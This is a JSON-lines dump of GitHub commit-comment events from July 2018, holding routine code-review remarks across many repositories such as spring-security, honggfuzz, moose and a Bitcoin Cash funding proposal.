{"id":"8016995825","type":"CommitCommentEvent","actor":{"login":"dwieeb"},"repo":{"name":"ionic-team/cordova-plugin-ionic-webview"},"payload":{"comment":{"id":29830062,"position":88,"line":93,"path":"README.md","commit_id":"5c8ad8e66b8ccb5c3dc415ad193409dba82d1690","created_at":"2018-07-25T14:48:38Z","updated_at":"2018-07-25T14:48:38Z","author_association":"CONTRIBUTOR","body":"(added to the `config.xml` within `platforms/` directory of a cordova project, not the base `config.xml`)"}},"created_at":"2018-07-25T14:48:38Z"}
{"id":"8016996194","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29830063,"position":39,"line":39,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:48:41Z","updated_at":"2018-07-25T14:48:41Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:48:41Z"}
{"id":"8016996925","type":"CommitCommentEvent","actor":{"login":"jgrandja"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29830066,"position":45,"line":45,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/DelegatingOAuth2TokenValidator.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-25T14:48:48Z","updated_at":"2018-07-25T14:48:48Z","author_association":"COLLABORATOR","body":"I do like the `OAuth2TokenValidatorResult` return type. Whether we return the first error and fail-fast or try all validators and return all messages is not a big concern right now. We just need to ensure we have a flexible return type."}},"created_at":"2018-07-25T14:48:48Z"}
{"id":"8016997124","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830067,"position":5,"line":5,"path":".gitignore","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:48:49Z","updated_at":"2018-07-25T14:48:49Z","author_association":"NONE","body":"This does not belong here"}},"created_at":"2018-07-25T14:48:49Z"}
{"id":"8016998424","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830069,"position":8,"line":8,"path":".gitignore","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:49:01Z","updated_at":"2018-07-25T14:49:01Z","author_association":"NONE","body":"This does not belong here"}},"created_at":"2018-07-25T14:49:01Z"}
{"id":"8016999282","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29830073,"position":43,"line":43,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:49:09Z","updated_at":"2018-07-25T14:49:09Z","author_association":"CONTRIBUTOR","body":"50.6 Bitcoin Cash to meet the objectives set at the beginning of this project, subsequently with the emergence of new objectives in accordance with the needs of the population for the use of Bitcoin Cash will be establishing new costs\r\n"}},"created_at":"2018-07-25T14:49:09Z"}
{"id":"8017001120","type":"CommitCommentEvent","actor":{"login":"jawadahmed23"},"repo":{"name":"jawadahmed23/Background_generetor"},"payload":{"comment":{"id":29830078,"position":null,"line":null,"path":null,"commit_id":"b401ce9a82dfb4195b91d693a2f4059588b96b7e","created_at":"2018-07-25T14:49:25Z","updated_at":"2018-07-25T14:49:25Z","author_association":"OWNER","body":"This is good.\r\n"}},"created_at":"2018-07-25T14:49:25Z"}
{"id":"8017001258","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830080,"position":9,"line":9,"path":".gitignore","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:49:26Z","updated_at":"2018-07-25T14:49:26Z","author_association":"NONE","body":"This does not belong here (don't keep the cloudformation scripts in your repo)"}},"created_at":"2018-07-25T14:49:26Z"}
{"id":"8017002323","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830081,"position":2,"line":2,"path":".gitignore","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:49:36Z","updated_at":"2018-07-25T14:49:36Z","author_association":"NONE","body":"This does not belong here"}},"created_at":"2018-07-25T14:49:36Z"}
{"id":"8017003120","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830086,"position":4,"line":4,"path":".gitignore","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:49:44Z","updated_at":"2018-07-25T14:49:44Z","author_association":"NONE","body":"This does not belong here"}},"created_at":"2018-07-25T14:49:44Z"}
{"id":"8017009661","type":"CommitCommentEvent","actor":{"login":"tute"},"repo":{"name":"merit-gem/merit"},"payload":{"comment":{"id":29830101,"position":5,"line":6,"path":"lib/merit/models/active_record/merit/activity_log.rb","commit_id":"27c4a5cba67c7ecce98b7338b253c563e4105d32","created_at":"2018-07-25T14:50:43Z","updated_at":"2018-07-25T14:50:43Z","author_association":"MEMBER","body":"Thank you for the note. We aren't testing against Rails 4.x as it's unsupported, so it makes sense to use previous merit versions to run alongside Rails 4 apps. Thanks!"}},"created_at":"2018-07-25T14:50:43Z"}
{"id":"8017010388","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830103,"position":10,"line":10,"path":".gitignore","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:50:50Z","updated_at":"2018-07-25T14:50:50Z","author_association":"NONE","body":"You don't need most of this stuff in .gitignore - just don't keep them in the directory where you keep the code..."}},"created_at":"2018-07-25T14:50:50Z"}
{"id":"8017012856","type":"CommitCommentEvent","actor":{"login":"Tabu-n"},"repo":{"name":"ANSWERWHX/NICE"},"payload":{"comment":{"id":29830108,"position":null,"line":null,"path":null,"commit_id":"df1b1cb6a3d8eb410f8a973b2712099941dd408e","created_at":"2018-07-25T14:51:11Z","updated_at":"2018-07-25T14:51:11Z","author_association":"NONE","body":"推荐Dreamweaver"}},"created_at":"2018-07-25T14:51:11Z"}
{"id":"8017014667","type":"CommitCommentEvent","actor":{"login":"DBOTW"},"repo":{"name":"EtchedPixels/xtrs"},"payload":{"comment":{"id":29830113,"position":7,"line":213,"path":"trs_io.c","commit_id":"d8dc8e4b0606ce2aea3f93013bddd1fb08932ab5","created_at":"2018-07-25T14:51:25Z","updated_at":"2018-07-25T14:51:25Z","author_association":"NONE","body":"Sorry for the noise: I was fooled by the warning of GCC 7/8 (`implicit-fallthrough`) ...\r\nHow about a comment to remove the warning and make things clearer?"}},"created_at":"2018-07-25T14:51:25Z"}
{"id":"8017021956","type":"CommitCommentEvent","actor":{"login":"jgrandja"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29830122,"position":36,"line":36,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/OAuth2TokenValidator.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-25T14:52:31Z","updated_at":"2018-07-25T14:52:31Z","author_association":"COLLABORATOR","body":"We should consider if we need to make `OAuth2TokenValidatorResult` generic as well -> `OAuth2TokenValidatorResult<T>`\r\n\r\nWill we have different representations of `OAuth2TokenValidatorResult` for the different `AbstractOAuth2Token`? I'm not sure at the moment but something we should consider."}},"created_at":"2018-07-25T14:52:31Z"}
{"id":"8017022306","type":"CommitCommentEvent","actor":{"login":"seb-buch"},"repo":{"name":"seb-buch/mdanalysis"},"payload":{"comment":{"id":29830125,"position":null,"line":null,"path":null,"commit_id":"9e47943283ffac5eaa37ef5b4b87e4acf0a3f8fa","created_at":"2018-07-25T14:52:34Z","updated_at":"2018-07-25T14:52:34Z","author_association":"OWNER","body":"Prior to filling the NS grid, all particles are put inside a rectangular box so the grid is never triclinic, this is why there is no need for triclinic shifts. To my understanding, this is the main reason why GROMACS performs everything using rectangular boxes. This is also why triclinic shifts appear in the pbc_dx from gromacs [pbcutil](https://github.com/gromacs/gromacs/blob/master/src/gromacs/pbcutil/pbc.cpp) but they are absent from the [nsgrid](https://github.com/gromacs/gromacs/blob/master/src/gromacs/mdlib/nsgrid.cpp)/[ns](https://github.com/gromacs/gromacs/blob/master/src/gromacs/mdlib/ns.cpp code.\r\n@kain88-de just removed some remains from a fully functional PBC handling which is not required here. "}},"created_at":"2018-07-25T14:52:34Z"}
{"id":"8017037476","type":"CommitCommentEvent","actor":{"login":"jgrandja"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29830159,"position":5,"line":5,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/OAuth2TokenValidatorResult.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-25T14:54:49Z","updated_at":"2018-07-25T14:54:49Z","author_association":"COLLABORATOR","body":"I feel this interface is too generic. I'll have to think about this a bit more."}},"created_at":"2018-07-25T14:54:49Z"}
{"id":"8017042601","type":"CommitCommentEvent","actor":{"login":"wentasah"},"repo":{"name":"Shanigen/kcf"},"payload":{"comment":{"id":29830172,"position":5,"line":37,"path":"src/kcf.cpp","commit_id":"8b28efcd5c939b1d41ce02ac0c2e267d204e4e72","created_at":"2018-07-25T14:55:37Z","updated_at":"2018-07-25T14:55:37Z","author_association":"COLLABORATOR","body":"This should be rewritten as\r\n```c\r\nif defined(BIG_BATCH) && defined(CUFFT)\r\n```\r\nIt is easier to understand."}},"created_at":"2018-07-25T14:55:37Z"}
{"id":"8017047663","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29830182,"position":47,"line":47,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:56:23Z","updated_at":"2018-07-25T14:56:23Z","author_association":"CONTRIBUTOR","body":"The impact will be significant in the economic model that is managed in this population, allowing the knowledge and use of Bitcoin Cash as payment method, encouraging later the involvement of people interested in the development and optimization of the Bitcoin Cash network."}},"created_at":"2018-07-25T14:56:23Z"}
{"id":"8017048748","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29830186,"position":52,"line":52,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:56:33Z","updated_at":"2018-07-25T14:56:33Z","author_association":"CONTRIBUTOR","body":"partially accepted, pending acceptance"}},"created_at":"2018-07-25T14:56:33Z"}
{"id":"8017051795","type":"CommitCommentEvent","actor":{"login":"feeley"},"repo":{"name":"gambit/gambit"},"payload":{"comment":{"id":29830192,"position":null,"line":null,"path":null,"commit_id":"354298e01c646b100f7ce530c4dcd75a784d9db2","created_at":"2018-07-25T14:56:59Z","updated_at":"2018-07-25T14:56:59Z","author_association":"MEMBER","body":"Fixnum overflow handling is done with ```##fx+?``` and friends.  So ```(fx+ x y)``` can be compiled to ```(or (##fx+? x y) (fx+ x y))```.  This generates GVM code of the form\r\n\r\n```\r\nvar = (##fx+? x y)\r\nif var ...\r\n```\r\n\r\nPreviously this was handled as two independent instructions: the first instruction tested overflow and the second instruction tested the var.  The C compiler did not optimize the second test away.  Now these are combined so that only the overflow test is done."}},"created_at":"2018-07-25T14:56:59Z"}
{"id":"8017053489","type":"CommitCommentEvent","actor":{"login":"TheSharpieOne"},"repo":{"name":"ui-router/core"},"payload":{"comment":{"id":29830194,"position":14,"line":32,"path":"src/params/param.ts","commit_id":"3cd5a2aec3298a594b598de4fbb35121f02098d2","created_at":"2018-07-25T14:57:14Z","updated_at":"2018-07-25T14:57:14Z","author_association":"NONE","body":"Hello `Array.prototype.find` polyfill"}},"created_at":"2018-07-25T14:57:14Z"}
{"id":"8017056347","type":"CommitCommentEvent","actor":{"login":"robertswiecki"},"repo":{"name":"google/honggfuzz"},"payload":{"comment":{"id":29830203,"position":null,"line":null,"path":null,"commit_id":"64e3a05714155bc19fdbd2a78be94a881fa35029","created_at":"2018-07-25T14:57:40Z","updated_at":"2018-07-25T14:57:40Z","author_association":"COLLABORATOR","body":"Race condition :) Done that in https://github.com/google/honggfuzz/commit/64e3a05714155bc19fdbd2a78be94a881fa35029"}},"created_at":"2018-07-25T14:57:40Z"}
{"id":"8017057470","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29830206,"position":null,"line":null,"path":null,"commit_id":"215302f06db153bea96ce6f2e805e4774d4c189d","created_at":"2018-07-25T14:57:50Z","updated_at":"2018-07-25T14:57:50Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2946 of 2946 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T14:57:50Z"}
{"id":"8017060462","type":"CommitCommentEvent","actor":{"login":"robertswiecki"},"repo":{"name":"google/honggfuzz"},"payload":{"comment":{"id":29830212,"position":null,"line":null,"path":null,"commit_id":"64e3a05714155bc19fdbd2a78be94a881fa35029","created_at":"2018-07-25T14:58:17Z","updated_at":"2018-07-25T14:58:17Z","author_association":"COLLABORATOR","body":"Ah.. PLOG does that, or, maybe you mean to move it to libhfcommon/files.c ?"}},"created_at":"2018-07-25T14:58:17Z"}
{"id":"8017060861","type":"CommitCommentEvent","actor":{"login":"wentasah"},"repo":{"name":"Shanigen/kcf"},"payload":{"comment":{"id":29830213,"position":79,"line":702,"path":"src/kcf.cpp","commit_id":"8b28efcd5c939b1d41ce02ac0c2e267d204e4e72","created_at":"2018-07-25T14:58:20Z","updated_at":"2018-07-25T14:58:20Z","author_association":"COLLABORATOR","body":"space after `=`"}},"created_at":"2018-07-25T14:58:20Z"}
{"id":"8017062060","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29830218,"position":null,"line":null,"path":null,"commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:58:32Z","updated_at":"2018-07-25T14:58:32Z","author_association":"CONTRIBUTOR","body":"Interested for the support of this project that will allow the massification of the use of Bitcoin Cash"}},"created_at":"2018-07-25T14:58:32Z"}
{"id":"8017062488","type":"CommitCommentEvent","actor":{"login":"oco-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29830219,"position":10,"line":342,"path":"addons/account/models/account_payment.py","commit_id":"75857a2c34611c496c949ee5cd16fa809f31e455","created_at":"2018-07-25T14:58:35Z","updated_at":"2018-07-25T14:58:35Z","author_association":"CONTRIBUTOR","body":"Not sure to follow you. In what case would you need to set default_journal_id to False explicitly ? Plus, this is a fix. As it is now, we apply the exact same behavior as before when we get a False or None default value. "}},"created_at":"2018-07-25T14:58:35Z"}
{"id":"8017067121","type":"CommitCommentEvent","actor":{"login":"dictav"},"repo":{"name":"NagaokaDevelopersStudy/ndsfm"},"payload":{"comment":{"id":29830226,"position":5,"line":14,"path":"docs/index.html","commit_id":"5db43f28589b4123046c0ffe540eb4d5246380fb","created_at":"2018-07-25T14:59:17Z","updated_at":"2018-07-25T14:59:17Z","author_association":"MEMBER","body":"おー、Chromeで警告出るようになりましたし、なんとかせんといかんですね"}},"created_at":"2018-07-25T14:59:17Z"}
{"id":"8017067796","type":"CommitCommentEvent","actor":{"login":"Solor"},"repo":{"name":"siweia/NDui"},"payload":{"comment":{"id":29830231,"position":4,"line":45,"path":"Interface/AddOns/AuroraClassic/FrameXML/ChatBubbles.lua","commit_id":"278875482493f91c46f595bf01c64c9113910921","created_at":"2018-07-25T14:59:22Z","updated_at":"2018-07-25T14:59:22Z","author_association":"NONE","body":"为什么要使用预定义的颜色而不是直接获取文字的颜色呢\r\n比如我自定义的 say 是淡蓝色 yell 是粉色，就会出现文字颜色和边框颜色不符的问题 😢 "}},"created_at":"2018-07-25T14:59:22Z"}
{"id":"8017072138","type":"CommitCommentEvent","actor":{"login":"jgrandja"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29830239,"position":43,"line":43,"path":"oauth2/oauth2-resource-server/src/main/java/org/springframework/security/oauth2/server/resource/authentication/JwtTimestampsValidator.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-25T15:00:00Z","updated_at":"2018-07-25T15:00:00Z","author_association":"COLLABORATOR","body":"Consider renaming to `DefaultJwtValidator` -> it's purpose is to validate common claims like `exp`, `nbf`, etc."}},"created_at":"2018-07-25T15:00:00Z"}
{"id":"8017072684","type":"CommitCommentEvent","actor":{"login":"FaideWW"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29830244,"position":31,"line":5370,"path":"engine/class_modules/sc_druid.cpp","commit_id":"a3c27cb469e21402808e4b71e47aaa8f37c1d522","created_at":"2018-07-25T15:00:06Z","updated_at":"2018-07-25T15:00:06Z","author_association":"CONTRIBUTOR","body":"Ah, thanks for the info!"}},"created_at":"2018-07-25T15:00:06Z"}
{"id":"8017073331","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29830245,"position":40,"line":40,"path":"modules/phase_field/include/kernels/ACInterfaceAniso2.h","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:00:12Z","updated_at":"2018-07-25T15:00:12Z","author_association":"NONE","body":"The function `nablaLPsi` does not include `\\dkappadgrad_etaa` so please remove that from the comment"}},"created_at":"2018-07-25T15:00:12Z"}
{"id":"8017073709","type":"CommitCommentEvent","actor":{"login":"seonjoob"},"repo":{"name":"seonjoob/PORTFOLI"},"payload":{"comment":{"id":29830247,"position":null,"line":null,"path":null,"commit_id":"ceac3c8dc158afaf178eaec5a81c54b95623fdc4","created_at":"2018-07-25T15:00:15Z","updated_at":"2018-07-25T15:00:15Z","author_association":"OWNER","body":"https://github.com/seonjoob/PORTFOLI/index.html"}},"created_at":"2018-07-25T15:00:15Z"}
{"id":"8017080069","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29830259,"position":121,"line":121,"path":"device/sensor/drv/drv_temp_humi_sensirion_sht3x.c","commit_id":"628de4c68fa7ed82c180ebb5154f07f8a85f9214","created_at":"2018-07-25T15:01:06Z","updated_at":"2018-07-25T15:01:06Z","author_association":"NONE","body":"oops, that's exactly what it does, nevermind.."}},"created_at":"2018-07-25T15:01:06Z"}
{"id":"8017082327","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"google/honggfuzz"},"payload":{"comment":{"id":29830263,"position":null,"line":null,"path":null,"commit_id":"64e3a05714155bc19fdbd2a78be94a881fa35029","created_at":"2018-07-25T15:01:23Z","updated_at":"2018-07-25T15:01:23Z","author_association":"NONE","body":"I mean to include in the messages errno. It should be thread safe.\r\n\r\nA proposed approach:\r\n\r\nhttps://github.com/google/honggfuzz/pull/212#issuecomment-407731957"}},"created_at":"2018-07-25T15:01:23Z"}
{"id":"8017082771","type":"CommitCommentEvent","actor":{"login":"michaldror26"},"repo":{"name":"michaldror26/Angular-Cities-Project"},"payload":{"comment":{"id":29830265,"position":null,"line":null,"path":null,"commit_id":"5354bbf6d248f2052fb1722a035eb3b61aa17974","created_at":"2018-07-25T15:01:27Z","updated_at":"2018-07-25T15:01:27Z","author_association":"OWNER","body":"angular"}},"created_at":"2018-07-25T15:01:27Z"}
{"id":"8017085601","type":"CommitCommentEvent","actor":{"login":"gsmachado"},"repo":{"name":"ICOnator/ICOnator-backend"},"payload":{"comment":{"id":29830270,"position":4,"line":17,"path":"commons/amqp-model/src/main/java/io/iconator/commons/amqp/model/constants/RoutingKeyConstants.java","commit_id":"28ef318ea0d55c082806bb892a6aab6dde35fa87","created_at":"2018-07-25T15:01:52Z","updated_at":"2018-07-25T15:01:52Z","author_association":"MEMBER","body":"Why did you remove the EXCHANGE_RATE_REQUEST_ROUTING_KEY ? Not being used?"}},"created_at":"2018-07-25T15:01:52Z"}
{"id":"8017087202","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29830273,"position":67,"line":67,"path":"modules/phase_field/include/kernels/ACInterfaceAniso1.h","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:02:06Z","updated_at":"2018-07-25T15:02:06Z","author_association":"NONE","body":"This is not used anywhere, please remove"}},"created_at":"2018-07-25T15:02:06Z"}
{"id":"8017090761","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29830279,"position":60,"line":60,"path":"modules/phase_field/include/kernels/ACInterfaceAniso2.h","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:02:36Z","updated_at":"2018-07-25T15:02:36Z","author_association":"NONE","body":"This is not used anywhere, please remove"}},"created_at":"2018-07-25T15:02:36Z"}
{"id":"8017091952","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29830281,"position":48,"line":48,"path":"modules/phase_field/src/kernels/ACInterfaceAniso1.C","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:02:45Z","updated_at":"2018-07-25T15:02:45Z","author_association":"NONE","body":"This is not used anywhere, please remove"}},"created_at":"2018-07-25T15:02:45Z"}
{"id":"8017092577","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29830282,"position":41,"line":41,"path":"modules/phase_field/src/kernels/ACInterfaceAniso2.C","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:02:51Z","updated_at":"2018-07-25T15:02:51Z","author_association":"NONE","body":"This is not used anywhere, please remove"}},"created_at":"2018-07-25T15:02:51Z"}
{"id":"8017093328","type":"CommitCommentEvent","actor":{"login":"richardjgowers"},"repo":{"name":"seb-buch/mdanalysis"},"payload":{"comment":{"id":29830283,"position":null,"line":null,"path":null,"commit_id":"9e47943283ffac5eaa37ef5b4b87e4acf0a3f8fa","created_at":"2018-07-25T15:02:58Z","updated_at":"2018-07-25T15:02:58Z","author_association":"NONE","body":"Cool thanks @seb-buch "}},"created_at":"2018-07-25T15:02:58Z"}
{"id":"8017094379","type":"CommitCommentEvent","actor":{"login":"feruzm"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29830285,"position":2,"line":2,"path":"app/templates/post-history.html","commit_id":"68ac19162962045a506ebf92e8c1ea61b2757b6a","created_at":"2018-07-25T15:03:08Z","updated_at":"2018-07-25T15:03:08Z","author_association":"MEMBER","body":"maybe add little padding on this list?"}},"created_at":"2018-07-25T15:03:08Z"}
{"id":"8017096123","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29830290,"position":134,"line":134,"path":"device/sensor/drv/drv_tvoc_sensirion_sgp30.c","commit_id":"01c386c0400ec82819e240467e5af8e6247404b8","created_at":"2018-07-25T15:03:23Z","updated_at":"2018-07-25T15:03:23Z","author_association":"NONE","body":"space after `if` and before `{`"}},"created_at":"2018-07-25T15:03:23Z"}
{"id":"8017096820","type":"CommitCommentEvent","actor":{"login":"nsamsono"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29830291,"position":null,"line":null,"path":null,"commit_id":"09232a6dbb6d70ab8f4d0f270d4cbf25cd6f8fc5","created_at":"2018-07-25T15:03:29Z","updated_at":"2018-07-25T15:03:29Z","author_association":"NONE","body":"Looks good. \r\nOne thing I would change is using hard-coded offsets.\r\nWhat do you think about adding #define values for the offsets?"}},"created_at":"2018-07-25T15:03:29Z"}
{"id":"8017097516","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29830293,"position":139,"line":139,"path":"device/sensor/drv/drv_tvoc_sensirion_sgp30.c","commit_id":"01c386c0400ec82819e240467e5af8e6247404b8","created_at":"2018-07-25T15:03:35Z","updated_at":"2018-07-25T15:03:35Z","author_association":"NONE","body":"spaces"}},"created_at":"2018-07-25T15:03:35Z"}
{"id":"8017098458","type":"CommitCommentEvent","actor":{"login":"neetjn"},"repo":{"name":"arelia/CoderSpace-Student-Roster"},"payload":{"comment":{"id":29830295,"position":10,"line":10,"path":"script.js","commit_id":"89e3b5cf1aa14319d6f618e42d1fc8ed6d7c7a47","created_at":"2018-07-25T15:03:44Z","updated_at":"2018-07-25T15:03:44Z","author_association":"NONE","body":"Rather than using a for loop to iterate through each of your DOM nodes, you can use the array method `forEach`.\r\n\r\nExample: https://jsfiddle.net/neetjn/vedr3b5x/4/\r\n\r\n```js\r\ndocument.querySelectorAll('.hide').forEach(student => {\r\n  student.classList.remove('hide')\r\n})\r\n```"}},"created_at":"2018-07-25T15:03:44Z"}
{"id":"8017101848","type":"CommitCommentEvent","actor":{"login":"robertswiecki"},"repo":{"name":"google/honggfuzz"},"payload":{"comment":{"id":29830304,"position":null,"line":null,"path":null,"commit_id":"64e3a05714155bc19fdbd2a78be94a881fa35029","created_at":"2018-07-25T15:04:13Z","updated_at":"2018-07-25T15:04:13Z","author_association":"COLLABORATOR","body":"PLOG() should do that automatically (as opposed to LOG) - P* from perror() if I remember correctly\r\n"}},"created_at":"2018-07-25T15:04:13Z"}
{"id":"8017104781","type":"CommitCommentEvent","actor":{"login":"windyoffice1"},"repo":{"name":"windyoffice1/TestShareGitProject"},"payload":{"comment":{"id":29830319,"position":null,"line":null,"path":null,"commit_id":"394b070f1dd28720bd94fe10b4ad2ac93b831f31","created_at":"2018-07-25T15:04:40Z","updated_at":"2018-07-25T15:04:40Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-25T15:04:40Z"}
{"id":"8017106711","type":"CommitCommentEvent","actor":{"login":"dormi"},"repo":{"name":"dradis/dradis-ce"},"payload":{"comment":{"id":29830324,"position":14,"line":32,"path":"app/jobs/activity_tracking_job.rb","commit_id":"851f1051a6fcde3b53c9fa766a658e5ae92de013","created_at":"2018-07-25T15:04:58Z","updated_at":"2018-07-25T15:04:58Z","author_association":"CONTRIBUTOR","body":"not all trackables have a commentable ?\r\nIf in the future we want to create notifications when an issue is created, trackable would be an issue but an issue does not have a commentable"}},"created_at":"2018-07-25T15:04:58Z"}
{"id":"8017108207","type":"CommitCommentEvent","actor":{"login":"falcoe"},"repo":{"name":"falcoe/pat"},"payload":{"comment":{"id":29830326,"position":null,"line":null,"path":null,"commit_id":"1f19844f2d203f08a483da308ad4ee358314c204","created_at":"2018-07-25T15:05:12Z","updated_at":"2018-07-25T15:05:12Z","author_association":"OWNER","body":"github被dns投毒，找了个能用的ip终于可以push了，涕零。"}},"created_at":"2018-07-25T15:05:12Z"}
{"id":"8017112610","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29830333,"position":25,"line":25,"path":"modules/phase_field/include/kernels/ACInterfaceAniso2.h","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:05:52Z","updated_at":"2018-07-25T15:05:52Z","author_association":"NONE","body":"Also please describe dependence of kappa on multiple order parameters"}},"created_at":"2018-07-25T15:05:52Z"}
{"id":"8017117594","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29830337,"position":19,"line":19,"path":"modules/phase_field/src/kernels/ACInterfaceAniso2.C","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:06:35Z","updated_at":"2018-07-25T15:06:35Z","author_association":"NONE","body":"Needs a better class description"}},"created_at":"2018-07-25T15:06:35Z"}
{"id":"8017118287","type":"CommitCommentEvent","actor":{"login":"olstenlarck"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29830340,"position":null,"line":null,"path":null,"commit_id":"321b76c302ac4142f615fc5811710e570fbe4ee2","created_at":"2018-07-25T15:06:42Z","updated_at":"2018-07-25T15:06:42Z","author_association":"CONTRIBUTOR","body":"Such small code?! Unbelieveable... :scream: "}},"created_at":"2018-07-25T15:06:42Z"}
